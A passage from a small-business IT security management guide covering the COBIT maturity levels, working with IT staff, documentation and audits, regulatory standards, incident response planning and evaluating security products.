be reading this. That immediately puts you ahead of some. The COBIT® IT management standard uses a
maturity model which generally describes where a business is on the road to IT nirvanna:
COBIT® IT Maturity Model

0: Non-Existant Management processes are not applied at all.
1: Initial Processes are ad-hoc and disorganized.
2: Repeatable Processes follow a regular pattern.
3: Defined Processes are documented and communicated.
4: Managed Processes are measured and monitored.
5: Optimised Good practices are followed, automated, and steadily adjusted.
[Itgi-2005 pp 18]
Notice that this is not expected to be an instantaneous transition, nor are you expected to sit down, write
hundreds of policies, and figure out how to implement them. Rather, policies and practice evolve together
in a feedback loop. As you figure out what works for your business, the best practices become policy. As
you get better at implementing, monitoring, and adjusting those policies, your IT structure will become
more mature, robust, and valuable.
A more detailed description of what the various stages mean for overall IT management is given on page
50 of the standard, but COBIT® also provides a specific scale for IT security on page 122. Since the
descriptions are long, I will only quote two levels here, the beginning and end of the process:
1 Initial/Ad Hoc
The organisation recognises the need for IT security. Awareness of the need for
security depends primarily on the individual. IT security is addressed on a reactive
basis. IT security is not measured. Detected IT security breaches invoke finger-pointing
responses, because responsibilities are unclear. Responses to IT security breaches are
unpredictable.
5 Optimised
IT security is a joint responsibility of business and IT management and is integrated
with corporate security business objectives. IT security requirements are clearly
defined, optimised and included in an approved security plan. Users and customers
are increasingly accountable for defining security requirements, and security functions
are integrated with applications at the design stage. Security incidents are promptly
addressed with formalised incident response procedures supported by automated
tools. Periodic security assessments are conducted to evaluate the effectiveness
of implementation of the security plan. Information on threats and vulnerabilities
is systematically collected and analysed. Adequate controls to mitigate risks are
promptly communicated and implemented. Security testing, root cause analysis of
security incidents and proactive identification of risk are used for continuous process
improvements. Security processes and technologies are integrated organisation wide.
KGIs and KPIs for security management are collected and communicated. Management
uses KGIs and KPIs to adjust the security plan in a continuous improvement process.
15
The most difficult work is in the middle. Ad hoc policies are difficult to automate and waste time discussing
small details. The overhead of a formal (but sensible) policy can be made up in automation and reduction
of friction, but a sensible policy cannot be written unless backed by experience and research. Before
reaching stage 4, you do not have enough information to really do adequate risk analysis in many cases,
but before reaching stage 3, ad hoc processes and general chaos reduce the utility of the information that is
gathered. Because of all of this, climbing the hump is hard, but it does get easier, especially when leaning
on established industry best practices and learning from the mistakes of others.
Your IT Professionals
The people that care for your computers have your business in their hands more so than any other
professional, such as an accountant or a lawyer. Their job is arcane, difficult to oversee, and requires them
to have access to disparate parts of your enterprise. Like a doctor, there is only so much you can do to
check up on them and then you just have to let them do the job. As such, perhaps the most important
quality in choosing an IT professional is trust.
As businesses are becoming overwhelmingly committed to electronic documents, essentially all of a

business' information passes through the purview of the top-level system administrator. They have direct
access to the hardware, the software, and the network. They have the skills of a hacker, or they would
not be able to secure your systems. Even if you use low-level protection like encryption and passwords
to protect documents, they have the ability to either simply override the protections or snoop on you to
discover the passwords. It might take time, but if they are determined, they can do it4.
Happily, most professionals are more interested in doing their jobs. Information security and systems
administration is a demanding discipline that often comes with limited recognition or reward. Those that
succeed do so because of a dedication and work ethic which drives them to master the skills and keep up
with changing technology. IT professionals take personal pride in the systems they maintain.
Tip
Business people work with people every day. IT people deal with machines. This leads to half
of the communication problems.
Active participation and open communication is the best way to reduce the threat of a rogue IT professional.
By making the effort to understand and involve yourself you not only have a better chance of noticing
potential problems, but you build trust and professional respect. Because of their dedication to a hard-edged
technical discipline, many good IT professionals are somewhat antisocial and apolitical. They may also
be brutally frank. Remember that IT deals with machines which never compromise and always take things
literally. This often leads to misunderstandings with business people who work on a very different level.
IT people often present options and risks very differently than other professionals. Managers usually
present a small number of options (often three) and their business risks. They clearly identify the option
they recommend (often the last one). When several managers are in a meeting together, discussion usually
converges on two options until the person in authority decides between them.
IT people often present one solution, then present variations on that solution, sometimes getting quite
complex and quickly confusing management. They are not presenting their alternatives as realistic options
but to demonstrate why their preferred solution (the first one) is correct. When you get several IT people
together, the solutions being discussed seem to diverge rapidly instead of working toward consensus.
This is an education problem with IT professionals. This style of argument is how IT people (and other
scientists) check their arguments and get feedback. Because technology does not compromise, they need
4
But see the discussion starting in the section called “Shared Folders and Files” about storing documents on untrusted computers or where the
administration is not trusted.
16
to know (and demonstrate) that their solution is rigorously correct. They do not realize that management
does not (and should not) care as long as they have done their job. IT professionals need to change their
presentation style and adapt to your vocabulary, explaining the minimum you need to understand to make
a business decision. Unfortunately, many IT people will not change and you will need to deal with this
problem from time from time, dragging them away from theory and back to the real concern: what is the
bottom line? At the same time, even if the presentation is wrong, the presenter is identifying real risks, and
you must not tune them out until you understand what it is they are trying to say, no matter how frustrating
that might be.
Tip
A good go-between, a professional in multiple fields, can translate IT-speak and present
alternatives in a digestible manner, smoothing communications.
One way to improve the situation is to find a translator: someone who understands enough of both your
field and IT to summarize the issues. These are usually IT people who have a degree in something other
than Computer Science who see technology as a tool, who have had to focus on practical application rather
than theory. As an example, I have a background in ecology and did work with simulations in college. I
wrote programs, but only as a means to an end; they were tools for answering questions. If the programs
could not be explained in non-IT terms, they were useless.
A good go-between does not have to be an expert in either field, they just have to be able to ask the
right questions and understand the answers. These are the people you want in your top-level IT positions,
trouble-shooting problem projects, and dealing with security incidents. They are hard to find, and hard to
recognize, but they do exist.
This type of professional can also be deliberately trained. When my simulation experience landed me a job
in the Pentagon working with strategic analyses, the first thing my boss did was put me on the floor with
the Air Force analysts. I was hired as a programmer, but I spent those first weeks as a user, a customer,
of the software I was eventually to maintain and redesign. I had to learn the terminology, processes, and
needs of the people I was hired to serve before I was allowed to do my job. I went from there to building
small tools, essentially templates or jigs, for very specific problems. Finally, when they felt I had learned
enough to get by I was allowed to work with the larger systems, but I still spent considerable time on the
floor with the pilots.
By taking a promising IT person and putting them in with your regular staff, making them learn your
business, you may end up with someone who can give you the feedback you need in a form you can use.
You can also go the other way, by having one of your employees work part-time as an IT-liason to bridge
the language gap and make IT solutions better targeted, easier to understand, and more practical. Choosing
someone to put into this role takes care; doing it sucessfully takes someone whose ego won't get in the way
of learning a new and unfamilar field and having to build the respect of the professionals they have been
thrown in with. You also have to beware the advice of the hobby IT professional who may set up computers
or networks at home and second-guesses IT's claims of cost or risk; techniques which work for two or even
ten computers do not scale to one hundred. They may have a point, but take it with a grain of salt.
Once you have a good go-between, they need to split their time so that they can keep up to date with
both camps and remain relevant. If you do not have enough to go around, you can have one person
consult to multiple teams or departments: walk the beat, sit in on meetings, review documents, and conduct
diplomacy. I have seen this work very well and is somewhat like the Of Counsel position in a law firm5.
IT expertise is critical to your business, but individual IT people, whether in house or outsourced, should
not be allowed to become indispensible. Good documentation, maintenance records, and problem tracking
5
Sometimes this can happen by itself, as someone with cross-over expertise lands naturally in the role of an unofficial diplomat. Your first step in
finding a go-between may be determining whether one is already there and how you can make better use of their skills.
17
help someone else pick up a task when needed. Sometimes employees have the mistaken impression that
being indispensible creates job security. In reality it locks them into a job with no chance of advancement
and will eventually lead to trouble. For the employer, there is always the worry about the inevitable job
change, illness, family emergency, or other sudden crisis that can cripple an unprepared business. A vendor
which has you locked in has no reason to negotiate and little need to deliver quality service.
Tip
Not involving yourself in IT is like not being involved in the company finances— you are inviting
someone to take advantage of you.
It may very well be that you are thinking “I don't have time to involve myself in IT.” That may well be
true, but like accounting, you just may not be able to afford not to be involved. If you are reading this
document, you already know that the world is changing. There is no way to turn back the clock and learning
to compete in the new environment means fitting IT into your overall strategy. Finding the right balance
is hard, but it must be found.
Document Retention and Protection

Document retention rules apply to more than just electronic data, but many small businesses may not have
coherent policies. Often rules for certain types of files, such as financial information, employee records, or
health information, are set by law. Other information may be controlled by contractual privacy policies or
confidentiality agreements. These rules usually specify the minimum and maximum time that documents
may be stored and who may access the documents. You may wish to implement specific policies to retain
or destroy outdated documents which fall under no particular rules in order to avoid costly document
production in response to subpoenas [SoleckiRosenberg-2004]. In all cases, you should consult books and
attorneys with coverage of the laws in your area.
We will discuss technologies for solving these problems elsewhere, but the first step is identifying what
types of documents may require special treatment. You probably already handle some paper documents
specially by locking them up, using a shredder to dispose of them, etc. Extend this to electronic documents
and think about what documents may need:
• to have restricted access,
• to be securely deleted,
• to be retained or deleted on a schedule,
• to be protected when sent over the Internet,
• to be protected from tampering or alteration,
• to have notarization or proof of service
Documentation, Policies, Audits— How Much, How

Often
Small Setups
The simple fact is that if your business is more than one person, and probably even if it isn't, basic
documentation on your network, computer configuration, and security is a necessity. If your setup is not
18
documented, you will have trouble getting help when you need it. Consultants will waste precious time
figuring out how things were supposed to work instead of fixing problems.
Tip
A doctor needs a good case history to treat a patient; a computer maintenance record fills the
same need and allows a professional to diagnose problems more effectively.
At a minimum for a small setup:
• Document the hardware, software, and versions on each system.
• Store license keys and warranty information for easy access along with dates of purchase and
installation.
• Document the changes made to a system to get it ready for use so you can follow the same steps when
repairing or setting up new systems.
• Store installation CDs, restore disks, and program disks so they may be easily located.
• Keep track of when maintenance is performed (virus scanning, updates, backups, repairs, etc.) or, if run
automatically, note when they are run and how often they are checked.
If outside consultants do these things for you, insist that they provide this documentation for your files on
every service. You never know if you will need to use a different vendor for some reason, and having your
own copy is a good precaution. For similar reasons, make sure you control the software disks, installation
keys, and warranty information. These would be good things to lock in a safe in case of fire or other
incident. You can make copies of the disks for everday use.
For Internet-facing machines, such as a company web or mail server, document what services you run and
keep safe copies of system settings. This will help you restore them if an intruder alters them and may
provide clues as to how they got in. Administrators should keep a journal of changes and events; I typically
added a bulletted list to the end of each day's charge sheet and kept a more detailed journal online. The
journal provides an easy point for someone new to pick up. System logs need to be backed up too, and, if
possible, immediately written to a different machine to keep an intruder from altering them.
Use some form of problem tracking or trouble ticket software to monitor problems and ongoing resolution.
There are many web-based systems at all price ranges (e.g. Best Practical Solution's RT6). The important
thing is that you can tell quickly what problems need to be solved, how long they have been open, and make
sure recently fixed problems have been resolved satisfactorily. A printout can be gone through quickly
in a meeting. The system will also allow notes to be added to problem reports so that someone can look
back and see how a similar problem had been solved or whether a certain type of problem is occuring
frequently. You can make such a system do double duty by using it to track non-IT problems as well.
Tip
Make sure each PC, workstation, or server is easily identifiable. The easiest way to do this is
with property tags and ID numbers. Non-removable tags or engravings also make tracking stolen
equipment much easier.
Documentation is not useful if it is not checked periodically. Incorrect information is worse than none at
all. Sit down and check maintenance records to see that they have been updated and that maintenance is
actually being done on schedule. It is easy for schedules to slip while dealing with day-to-day emergencies.
Look at vendor invoices to make sure they identify the machine, report what was done and why. If you
do not understand, ask questions.
6
http://www.bestpractical.com/rt/index.html
19
Tip
Gibson Research's7 Shields Up8 is a website which will run a quick test of a SOHO PC and
produce a security report.
There are automated tools for detecting vulnerabilities in PCs and servers. Nessus9 is one of several such
products. Using one on a regular basis and fixing reported problems will go a long way toward making
your systems more secure. The bad guys have access to the same tools and running them will be one of
their first steps.
Larger Setups and Standards Compliance

If you have a larger setup or have to comply with external standards such as HIPAA, or the Payment
Card Industry Data Security Standard (PCI DSS) your documentation needs will be more complex. The
cost of regulatory compliance can be high, particularly where the legal landscape is changing. Recently
passed regulations have not had the time to be interpeted by the courts and some laws, such as state
consumer protection laws, may be triggered without a business' awareness, merely by serving an out-of-
state customer (e.g.: California SB 1386 [CaSenate-2003]). Small and medium-sized businesses without
a dedicated compliance department can be hard pressed to stay informed, let alone compliant.
A more proactive approach may be in order. Even where you are not specifically required to conform to
a particular high-level industry standard, using one, such as COBIT®, ISF Standard of Good Practice, or
ISO/IEC 17799:2005, as the basis for your policies can yield many advantages:
• useful guidance for policy development so you do not need to start from scratch
• milestones to measure progress and plan improvement
• a common framework and vocabulary for working with IT and security professionals, partners, and
vendors, including some “canned” policy or auditting products.
• preparation for future regulatory changes
• reducing the threat of being sideswiped by non-compliance to laws you are unaware of and allowing
you to defend policies by referring to accepted best practice
• new opportunities such as eligibility for contracts and increased customer confidence
[Harbert-2006, Itgi-2006]
Some of the most important things that are required by standards are:
• IT security is recognized at the business level and accounted for in strategic planning.
• Clearly defined responsibility for overall IT security and for each system. This can range from a single
individual responsible for all security and systems (in a very small setup) to a group responsible for
overall security and individual “ownership” of individual critical systems. Standards encourage different
security roles to be distributed among different people, so that the people validating security are not
the people providing it.
• That information and systems be graded according to their value or need for protection, that regular risk
analysis be performed, that security resources be allocated accordingly, and that emplaced security is
examined and audited regularly.
7
http://www.grc.com/intro.htm
8
https://www.grc.com/x/ne.dll?bh0bkyd2
9
http://www.nessus.org/
20
• Controls for restricting access to systems and information to those with a need to access them, protection
of information within the business from inadvertant disclosure, and safeguards for information in transit
to and storage by third parties.
• A defined process for keeping systems up to date and for approving changes to systems, policies, and
procedures, including testing systems changes before implementation.
• That breaches of security, suspected breaches, and suspected vulnerabilities are reported.
• Staff education in security practices and requirements including clearly written and consistently
enforced policies in acceptable use of computers, networks, information, and company-owned software.
• Physical security to prevent direct access to critical systems and information.
[Isf-2005a SM1.2, Itgi-2005 pp 119-122, Dhhs-2003, PciSsc-2006]
So the bottom line, then, is that these policies need to be written in some form and some record needs to
be made whenever they are implemented. For businesses on the small end of the range, reading and trying
to implement these standards can seem daunting. A small business is unlikely to have an “IT Steering
Committee” or any kind of complex approval process for software changes, beyond, perhaps, John and
Susan sitting down over lunch. PCI DSS, HIPAA, and ISO 17799 make some allowance for small and
medium-sized businesses. Cobit®, aside from its other virtues, makes assumptions about the size and
structure of the business.
Even if a process is simple and informal, it is still worth documenting and recording the decisions made.
Like the process itself, the documentation will not be very complex. Regarding John and Susan, for
instance, the following might be sufficient:
Met with Susan today to discuss the changes to the backup system. Showed her the
research I had done on Acme Corp's product, including favorable security reviews. She
expressed reservations over committing to a single vendor, but we both agreed their
product would best fit into our current structure, particularly the accounting system.
Decided to go ahead with purchase and rollout. — John.
It documents an approval process, records that research was done, (printouts of reviews can be added to the
file) and details the reasons for and against the decision. Not only is this a step toward standards compliant
procedures, but it means that a year or two down the road you can look back at the file and see why a
particular change was made. All too often, people are afraid to challenge old systems because they do not
remember why the decision was made and that those reasons may no longer be relevant (perhaps because
the old accounting system is no longer used). Lastly, the document is simple and adds little overhead.
Many other requirements can initially be filled in a similar fashion. In a small business, it is unlikely that
there will be many systems, categories of information, or classifications of employees which need to be
documented. Workflows will be short and simple. Documents and policies can grow with the business
and as problems are discovered.
One complexity which should not be ignored is the fact that Information Security records themselves
are a category of document which may need special handling! For instance, HIPAA requires that
security policies and records must be retained for six years [Dhhs-2003 §164.316b2i]. Documents that
contain sensitive security information may need to be protected, and documents such as logs which may
accidentally contain personal, confidential, or otherwise sensitive information may need to be protected,
redacted, or deleted on a schedule.
Frequency and type of audits varies widely on the needs of the organization, budget constraints, and
perceived risks, but there are some rules of thumb.
21
Many tools, such as virus/malware scanners, vulnerability scanners, and intrusion detection systems can
be run daily without intervention but someone must actually look at the output in order for them to be
effective. Some tools can automatically send reports to a central location, such as an administrator's email,
(emv 20070424) example? and this should be looked for when selecting tools. The difference between a
successful and a failed run should be immediately obvious, especially if many systems are being scanned,
otherwise problems will be lost in noise.
Quick checks of security status can be performed at a weekly meeting. As noted above, a printout from
a problem tracking application is an effective and efficient way to view recent activity and outstanding
issues. A more thorough check of maintenance records, security reports, and other documents can happen
monthly, with a full top-down audit quarterly.
The frequency of external audits depends on many issues. First, external auditors tend to be expensive,
so there is no sense in bringing in an outside auditor without having done a full internal audit first. Why
pay someone to catch mistakes you might have fixed yourself? Instead, use the external auditor to verify
your internal procedures and find problems that would never have crossed your mind at all. How often
you do it depends on whether you have any requirements to maintain a certification; if so, you will likely
need an external audit on a regular (say yearly) schedule and may have the threat of random spot checks.
If you are not required to audit on a schedule, then you need to look at how the cost of the service affects
your budget and how quickly your procedures change. If you have relatively stable procedures and regular
internal audits, it may make more sense to spend the time and money on other security needs and bring
an outsider in less frequently. No matter what you decide, make sure an auditor you hire is aware of your
security goals, resource limitations, and the threats you are intending to address so they can concentrate
their effort where it will give you the most benefit. There is no sense in paying money to have them point
out problems you have no intention or capability of fixing.
Tip
I like to set up an internal web page with all of the security policies clearly laid out. Employees
should bookmark this page in their web browser. During an audit, if they cannot remember a
specific policy, they can quickly navigate to the required page and demonstrate that they know
how to find the needed information. This also helps with the inevitable nervousness that going
through an audit brings and makes sure the employee responds with the most current policy. The
obvious exception to this is backup and recovery procedures which must be printed and bound
so that they can be accessed when computers and networks are not functioning.
An external auditor may examine many things. They will examine your policies and a representative
sample of your records and documents. They want to know whether your policies are sound and whether
you actually follow them consistently. They will likely quiz random employees to see if they know and
understand your policies and their responsibilities. Depending on the type of audit, they may also examine
your physical layout and security (are cabinets locked, unoccupied terminals logged out, can a security
monitor be seen by someone on the other side of the desk?), or try to break into your network or computers.
Good security auditors will try “human enginering” to trick your employees into violating security. When
preparing for an audit, you must anticipate these tactics and ensure that everything is in order.
An Incident Response Plan

No matter how good your security is, you will eventually have to deal with an incident. Various regulations
require you to have a documented Incident Response Plan [Dhhs-2003 §164.308a6, PciSsc-2007 §12.9,
CaSenate-2003], but provide little guidance as to how to organize or implement such a plan. Common IT
management standards also offer little help [Isf-2005a SM5.4, Itgi-2005 DS5.6, DS8], with ISO 17799
providing the most detail [IsoIec-2005 §13]. The Computer Emergency Response Team Coordination
Center10 (CERT/CC) provides a detailed handbook on organizing a Computer Security Incident Response
10
http://www.cert.org
22
Team or CSIRT [SeiCm-2001]. The discussion here will provide an overview focusing on practical rather
than organizational matters.
A security incident may take many forms:
• A physical break-in where equipment or media is missing or may have been accessed.
• An attempted network or computer break-in.
• A successful computer or network break-in.
• A virus or malware infection.
• Missing (lost or stolen) media or hardware.
• Unauthorized access to documents or data by an employee, vendor, or third party.
• A Denial-of-Service
In some cases, you may not be able to tell whether confidential data was actually accessed or copied and
may need to assume the worst, at least until the incident can be completely investigated.
Attempted accesses should be reported, even though they were not successful. Reporting attacks to
appropriate authorities, beginning with the owner of the network which originated the attack, can help
other organizations locate and close security holes and may temporarily eliminate an attacker. An attacker
who fails to gain entry repeatedly only needs to succeed once. Make sure that security rules are modified
to block or monitor repeated access attempts from the same source. If (as is likely), there are too many
attempts to report, choose the attacks which target software and services you run and therefore concern
you the most.
When a security incident is discovered, there are three immediate goals:
Immediate Goals
Contain the Damage Stop the spread of an infection, close the hole an intruder is using to enter,
and protect data from unauthorized access.
Restore Services Get computers, systems, or services back into (safe) operation so that
business can continue. This may mean that services operate in a degraded
(slower or reduced functionality) mode until complete repairs can be made
and security reestablished.
Preserve Evidence Any data which can identify the attacker, the means of entry, or the amount
of data they may have accessed should be preserved for later analysis.
Tip
Make sure that the appropriate points of contact for reporting incidents are well posted. An
internal webpage is probably a good idea and gives you a place to post advisories and reporting
guidelines. If you or your security vendor relies on computer-based reporting and tracking, make
sure there is also an alternative, since problems involving computer, network, or account failures
will need to be reported too.
Implicit in these goals is a means to actually identify and report the problem in the first place. This requires
some point of contact(s) who is/are assigned to incident response and available, preferably 24/7. Problems
may also be reported by automated systems which may be set up to page or otherwise notify on-call
administrators. These personnel start an incident report and classify the problem. Next, they refer to policy
23
to determine what other members of IT, Security, and Management need to be involved and how quickly.
Then, if the problem is legitimate, they attempt to satisfy the three immediate goals. The group of Security,
IT, and Management who are involved in handling security breaches are the Incident Response Team,
sometimes referred to as a Computer Emergency Response Team (CERT) or Computer Security Incident
Response Team (CSIRT). We use the acronym CSIRT here.
In the early stages of dealing with a security breach, a heavy-handed approach is often safer and easier.
For instance, it may be simplest to remove a compromised machine from the network and temporarily
install a different machine for an employee. This will give your CSIRT time to examine the machine
properly and make sure that the threat is completely removed. Anti-virus programs will try to remove a
detected infection, but the truth is that they are not often successful. A virus may very well make changes or
install software that the anti-virus cannot detect or cannot safely undo. Similarly, a hacker having broken
into a web server can hide changes in many subtle places which might provide a means of reentry. A
complete reinstall is safe, thorough, and may even be faster than attempting repairs. The heavy handed
approach, however, means that you must budget for some spare hardware and make sure that documents
are backed up regularly, both of which will protect you from other kinds of incidents as well. Remember
that replacement hardware is temporary and need not be as fast or fancy as the original system.
Tip
Act quickly and decisively: A PC can always be restored to a network and accounts reenabled
after they are shown to be safe. You will not be able to recover confidential data that has been
copied to somewhere beyond your control.
The heavy-handed approach should also be taken with possibly compromised accounts. If you have
reason to believe that an account has been compromised or has been used for unauthorized access to
data, lock it, and seriously consider locking all accounts used by the same person until you can interview
the employee, scan their PC, laptop, etc., for malware, and change their passwords or credentials. Over-
zealousness should not be a problem as long as everything you do is reversible, your investigative process
is streamlined, and you keep people informed of what actions are being taken and why.
Once a compromised system has been isolated, data should be gathered for later examination. Some of this
can be gathered from the live machine with computer forensics software or hardware to examine memory.
In particular, you can record what programs are run and where they attempt to connect to. Live forensics
programs have serious limitations, however, and can be hoodwinked by infections which have gained deep
control over the operating system [Higgins-2007]. Any relevant network or other access logs should also
be copied and stored along with applicable physical security information such as check-in/check out times
and CCTV footage if local access is suspected.
Almost immediately, a copy of the hard-drive should be made (an image). In fact, it is best to make two, one
to preserve untouched for law enforcement (if applicable) and one to actively examine. Then the hard drive
can be wiped clean, reinstalled, and put back to use. One attraction of virtual machine (VM) technology
is that the “hard drive” the operating system is running on is not real, but is in fact a drive image stored in
a file. That image can be copied or reset to an earlier (and safe) state quickly and easily making cleanup
from break-ins fast and efficient.
When gathering evidence, be careful to keep a documented chain of custody; record who handles each
piece and what tests are run. Print and store output of all procedures. If at all possible, ensure that all actions
have an additional witness present. Your legal counsel will likely have additional advice for preparing
evidence which can be used by law enforcement.
Throughout this process, be careful with communication about the incident. Ensure that team members
verify the identity of who they are communicating with (employees, IT staff, vendors, authorities, etc.)
and protect the privacy of the communication. Impersonation to obtain security information is common.
Information leaks can start rumors and undermine the handling of an incident before an investigation can
24
be completed. They may also inform an attacker of the progress of an investigation. The CSIRT should
control the release of information to ensure that it is accurate, complete, and does not compromise security.
[BrownleeGuttman-1998 pp 5-6, West-BrownEtAl-2003 pp 106-110]
After the initial stages, incident response can take any of several directions, depending on what was
compromised, how it was compromised, and whether it can reasonably be expected to happen again. This
is where clear policy and clearly defined responsibilities are critical, and their exact form depends on the
size and type of business you run. Your overall goal, however, will be the same: comply with all regulations
and privacy rules to resolve the incident and prevent recurrence with as little disruption as possible. The
CSIRT team is not there to play policeman unless there is something to be gained. What you do next will
depend on some of the following questions:
Follow-up Questions
• How did the incident occur? Is this incident related to other incidents?
• What permanent changes need to be made to prevent recurrence? Is it covered by a support agreement
or contract? Is this a technological or a policy problem?
• How was the problem discovered? Could it have been discovered sooner? Should a warning or advisory
be issued?
• Was the incident a result of a broken policy or agreement? Does action need to be taken?
• Is there enough evidence to involve a 3rd party such as a security organization or law enforcement and
pursue the criminal?
• Was, in fact, confidential data compromised? Could it have been copied somewhere outside of business
control? Can the thief potentially read/use the data, or is it strongly encrypted?
• If data was compromised, who does it belong to? What other parties must we inform to comply
with regulations and contractual obligations (e.g. customers, credit card companies, vendors with
confidentiality agreements, etc.). Do we have contractual liabilities?
• If our data was compromised or destroyed, what can we do to mitigate the loss? Is a loss covered under
an insurance policy?
• Were sensitive records modified or destroyed (billing records, account information, contracts, access
logs, employee records, etc)? What can we do to identify fraudulent records and restore them? Is our
backup and recovery system working?
• Was our system used to attack other systems (such as visitors to our web site)? Did these attacks succeed?
Who do we need to inform?
• Do we need to make a public statement or control negative publicity?
The answers to these questions should result in a list of action items to be passed on to other parts of the
company, such as IT changes, policy updates, legal actions, press releases, and so forth as necessary. In
a small company, of course, these actions will be handled mostly by the same people wearing different
hats. The team should also produce a clear and concise report of the incident and a summary of the actions
taken for the record.
A heavy-handed approach is appropriate early on, but the response should be more reasoned as the incident
is investigated. In particular, be careful to differentiate between a possible inside job, a violation of policy,
and simple human-error. If management is too quick to hand out blame, less incidents will be reported
in the future.
25
Each set of regulations you must comply with will have its own slightly different set of definitions for what
constitutes a compromise, when, and whom you must inform. As an example, regulations may only care
about incidents in which certain combinations of data are released, such as addresses and social security
numbers linked to first and last names (e.g. California SB 1386 [CaSenate-2003]). Either these details
must be codified in your own policy, or you simply need to have your policy refer to the relevant sections
of the regulations and go through them as needed. For serious breaches, you will need legal counsel to
help you navigate this minefield. As you go through the process, you will likely build up boilerplate letters
and forms to streamline many of the steps.
In addition to complying with regulations, you may need to coordinate with outside agencies such as other
CSIRTs to:
• Report software vulnerabilities.
• Obtain technical support.
• Help track or apprehend the criminal.
• Obtain more information about the attacker such as means of entry, whether data might have been stolen,
and what it might have been used for from other ongoing investigations.
• Warn others of attacks which may have been made from your network or infections passed on.
• Obtain outside review of proposed solutions.
In order for interoperation to work, you will need to give thought to confidentiallity arrangements,
preferably beforehand. What information can you share with an outside agency? What confidential
information might need to be redacted from incident reports or logs? What limits on use of the information
do you need to communicate to the outside agency? You must also make sure you have prepared legitimate
points of contact with the most likely outside agencies so you can maintain the privacy and integrity
of the communications [BrownleeGuttman-1998 pp 5-6, 11-14, SeiCm-2001, West-BrownEtAl-2003 pp
112-115].
At the end of the process, one last set of questions should be asked:
Port-Mortem
• What is the approximate cost of this incident?
• Were the actions taken timely and appropriate? Could the reponse have been improved?
• Did the Incident Response Plan work? Are the roles and responsibilities appropriate? Does the plan
need adjustment?
• Did the CSIRT have the resources needed to do its job efficiently? What might make the job easier?
A brief treatment of these questions, perhaps directly including comments by team members or employees
involved in the incident, should go in an after-action report to be filed with the incident and be considered
in future responses.
Tip
The US-CERT Vulnerability Database11 is a good source for information on current threats. There
is a mailing list available for daily announcements. You should also check regularly with your
software and security vendors for problems and fixes.
11
http://www.kb.cert.org/vuls/
26
In addition to clean-up after incidents occur, the CSIRT in most organizations is also responsible
for tracking developing threats by monitoring announcements of security agencies, vendors, and peer
organizations, informing IT staff, and drafting warnings or advisories for distribution to employees,
customers, and other stakeholders.
Making IT and Security Purchases

Avoiding the Lemons
When I was younger, I went on a mission with my dad to buy a used car. We took my uncle along, who
owned a repair business, and took a look at several “deals”. I remember one in particular, a blue Ford
sedan of some description with low mileage and a decent price. My father talked to the salesman while
my uncle poked around the car. The salesman was expounding the virtues of the vehicle when he noticed
what my uncle was doing. “Is he a body man?” the seller asked. “Yep.” my dad answered. The salesman
immediately gave up the pitch. Many years later, I think back to that car when making purchase decisions.
Aside from sound policies, security awareness and training, threat tracking, one aspect of proactive security
is sound IT purchasing and deployment. This is not an easy subject and there is no magic formula,
especially when a business is bound by legacy systems and a need for compatibility with customers,
vendors, and government agencies. There are many snake-oil salesmen. Common products are released to
market much too soon and, as a consequence, rife with vulnerabilities.
The problem can be illustrated by the Secustick™, a password-protected USB memory stick which is
supposed to erase itself after several failed access attempts. The device was used by many organizations
for sensitive data— until it was demonstrated that its security was simplistic and could be broken with
minimal time and effort [Tweakers-2007]. Noted security expert Bruce Schneier discusses this device in
his column, Security Matters, the general poor quality of security technology, and the difficulty of IT
customers in separating the wheat from the chaff, comparing the industry to the used car market.
In general, he says, in any industry where the seller knows more about the product than the buyer, good
products are undercut and people tend to buy lemons:
Take the market for encrypted USB memory sticks. Several companies make encrypted
USB drives— Kingston Technology sent me one in the mail a few days ago— but even
I couldn't tell you if Kingston's offering is better than Secustick. Or if it's better than any
other encrypted USB drives. They use the same encryption algorithms. They make the
same security claims. And if I can't tell the difference, most consumers won't be able
to either.
—[Schneier-2007]
In this section, I try to improve your chances of “getting it right,” but in general:
• Don't lock heads with technology zealots; different technologies, different approaches, have their place.
• If it ain't broke, don't fix it; do not rush to embrace brand new technology.
• Use a defense in depth; do not bet everything on one product.
• Consider product failure in your risk analysis; what happens if you need to switch vendors or downgrade
due to an intractable problem?
I will mainly focus on security-specific software, but much of the discussion will apply to products
containing security features and IT decisions generally.
27
Simple, Proven, Standard
What's In a “Standard”?
There is a lot of confusion between the words standard, de-facto standard, open, and open source.
These terms are discussed individually in the glossary, but we will discuss them in relation to IT
purchases here.
Standards are published specifications which anyone can examine. Open standards are maintained
by some form of group consensus and licensed so that anyone, even direct competitors of the
publisher or submitter, can comment on them or use them. A standard provides the benefits of peer
review and interoperability: a potential user can depend on the process to provide some guarantee
that compliant products meet some level of quality and function the same as other compliant
products. Interoperability allows the user an out if a product they depend on turns out to not meet
their needs due to quality, legal concerns, security, scalability, or cost. De-facto standards, products
or practices in common use throughout the industry but not specifically defined, do not give the
customer any of the benefits of an open standard and may lead to vendor lock-in.
Specifications which are encumbered by intellectual property licenses, non-compete agreements, or

non-disclosure agreements are not “standards” for our purposes here, since they do not benefit from
peer review or interoperability. To be useful, a standard must allow and encourage open competition.
Open source products, products whose source code is publicly available and group maintained,
have the aspects of peer review and group control, but are not themselves “standards” and may or
may not interoperate with other products. Many open source products, however, are also standards
compliant. For instance, the popular Apache Web Server implements the Hypertext Transfer
Protocol (HTTP) and the Common Gateway Interface (CGI) standards, among others, and does
essentially the same job as any other web server. Linux™ closely follows the UNIX™ operating
systems standards and Linux applications can easily run on other UNIX systems such as Sun
Solaris™ or Apple's OS X™.
Standards, like any process involving humans, are not perfect. In the groups I have been involved
with, hundreds of emails can sometimes be spent arguing over details which eventually get
tabled and left ambiguous in the specification because no one can agree on a single approach.
Industry guidelines or recommendations fill gaps until the standard catches up and, in the
meantime, customers experience incompatibilities and headaches. In the end, however, standards
help customers get what they want and know what they are getting.
Generally, people are concerned about three aspects of security technology: cost, functionality, and
effectiveness. Only two of those can be effectively judged by most consumers. Cost, or, at least, price, is
an easy item to judge. Features is a little bit tougher, particularly if unwilling to take vendor claims at face
value. Fortunately, it is relatively easy to find press reviews for many products which will describe basic
features and ease of use. Ease of use impacts Total Cost of Ownership (TCO) by affecting support and
training costs. Ease of use also impacts effectiveness to the extent that a product which is difficult to use
or understand will probably not be used properly. Reviews of product effectiveness, especially competent
ones, are much harder to find. Press reports stick to features and price in reviews because they require
less expertise to write, do not require expensive labs, are faster to market, and do not lose the reader in
the first paragraph.
Not only is the effectiveness of a security product hard to judge, it is also hard to get right. Security
requires expertise, a disciplined process, and rigorous testing, all of which is expensive. Leaning on
established, standard, technology helps, but even when using a standard, an encryption algorithm, for
instance, the vendor must make sure that their implementation of the standard is correct and nothing in the
